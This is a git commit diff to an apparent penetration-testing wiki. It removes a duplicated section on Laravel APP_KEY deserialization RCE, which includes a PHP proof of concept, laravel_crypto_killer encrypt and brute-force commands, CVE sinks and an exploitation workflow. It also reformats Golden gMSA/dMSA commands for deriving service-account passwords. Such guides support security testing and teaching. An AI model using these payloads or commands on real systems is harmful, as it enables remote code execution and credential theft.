f

carlospolop · carlospolop · commit 71b9eb4ca7cc · 2025-07-28T12:56:40.000+02:00
diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -83,16 +83,6 @@ Key findings of the research published by Synacktiv (2024-2025):
 
 The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
 
----
-
-## References
-* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
-* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
-* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
-* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
-
-
-
 
 ## Laravel Tricks
 
@@ -187,93 +177,7 @@ Or you can also exploit it with metasploit: `use unix/http/laravel_token_unseria
 
 Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
 
-### Laravel SQLInjection
-
-Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-
-
-### Laravel SQLInjection
-
-Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-
----
-
-## APP_KEY & Encryption internals (Laravel \u003e=5.6)
-
-Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).
-The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:
-
-```json
-{
-  "iv"   : "Base64(random 16-byte IV)",
-  "value": "Base64(ciphertext)",
-  "mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
-  "tag"  : ""                 // only used for AEAD ciphers (GCM)
-}
-```
-
-`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas
-`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value.
-Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**.
-
-Minimal PoC (framework ≥9.x):
-```php
-use Illuminate\Support\Facades\Crypt;
-
-$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
-$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
-```
-Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …).
-
----
-
-## laravel-crypto-killer 🧨
-[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode:
-
-```bash
-# Encrypt a phpggc chain with a known APP_KEY
-laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
-
-# Decrypt a captured cookie / token
-laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
-
-# Try a word-list of keys against a token (offline)
-laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
-```
-
-The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.
-
----
-
-## Real-world vulnerable patterns
-
-| Project | Vulnerable sink | Gadget chain |
-|---------|-----------------|--------------|
-| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
-| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
-| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
-
-The exploitation workflow is always:
-1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
-2. Generate gadget with **PHPGGC**
-3. `laravel_crypto_killer.py encrypt …`
-4. Deliver payload through the vulnerable parameter/cookie → **RCE**
-
----
-
-## Mass APP_KEY discovery via cookie brute-force
-
-Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.
-
-Key findings of the research published by Synacktiv (2024-2025):
-* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
-* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
-* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
-* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
 
-The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
-
----
 
 ## References
 * [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
diff --git a/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md b/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
@@ -10,7 +10,7 @@ There are two major flavours:
 1. **gMSA** – group Managed Service Account – can be used on multiple hosts that are authorised in its `msDS-GroupMSAMembership` attribute.
 2. **dMSA** – delegated Managed Service Account – the (preview) successor to gMSA, relying on the same cryptography but allowing more granular delegation scenarios.
 
-For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash.  Instead every DC can **derive** the current password on-the-fly from:
+For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash. Instead every DC can **derive** the current password on-the-fly from:
 
 * The forest-wide **KDS Root Key** (`KRBTGT\KDS`)  – randomly generated GUID-named secret, replicated to every DC under the `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …` container.
 * The target account **SID**.
@@ -35,7 +35,7 @@ This is analogous to a *Golden Ticket* for service accounts.
 3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code.
 
 ### Golden gMSA / dMSA
-##### Phase 1 – Extract the KDS Root Key
+#### Phase 1 – Extract the KDS Root Key
 
 Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets):
 
@@ -60,7 +60,7 @@ The base64 string labelled `RootKey` (GUID name) is required in later steps.
 
 Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
 
-```powershell
+```bash
 # Authenticated or anonymous depending on ACLs
 Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
   Select sAMAccountName,objectSid,msDS-ManagedPasswordId
@@ -70,7 +70,7 @@ GoldenGMSA.exe gmsainfo
 
 [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes:
 
-```powershell
+```bash
 # LDAP enumeration (kerberos / simple bind)
 GoldendMSA.exe info -d example.local -m ldap
 
@@ -88,7 +88,7 @@ Because the GUID is 128-bit, naive bruteforce is infeasible, but:
 
 Therefore a **narrow wordlist per account** (± few hours) is realistic.
 
-```powershell
+```bash
 GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUID>
 ```
 The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute – the match reveals the correct GUID.
@@ -97,7 +97,7 @@ The tool computes candidate passwords and compares their base64 blob against the
 
 Once the ManagedPasswordID is known, the valid password is one command away:
 
-```powershell
+```bash
 # derive base64 password
 GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> -i <KDSRootKey ID>
 GoldenGMSA.exe compute --sid <SID> --kdskey <KDSRootKey> --pwdid <ManagedPasswordID>
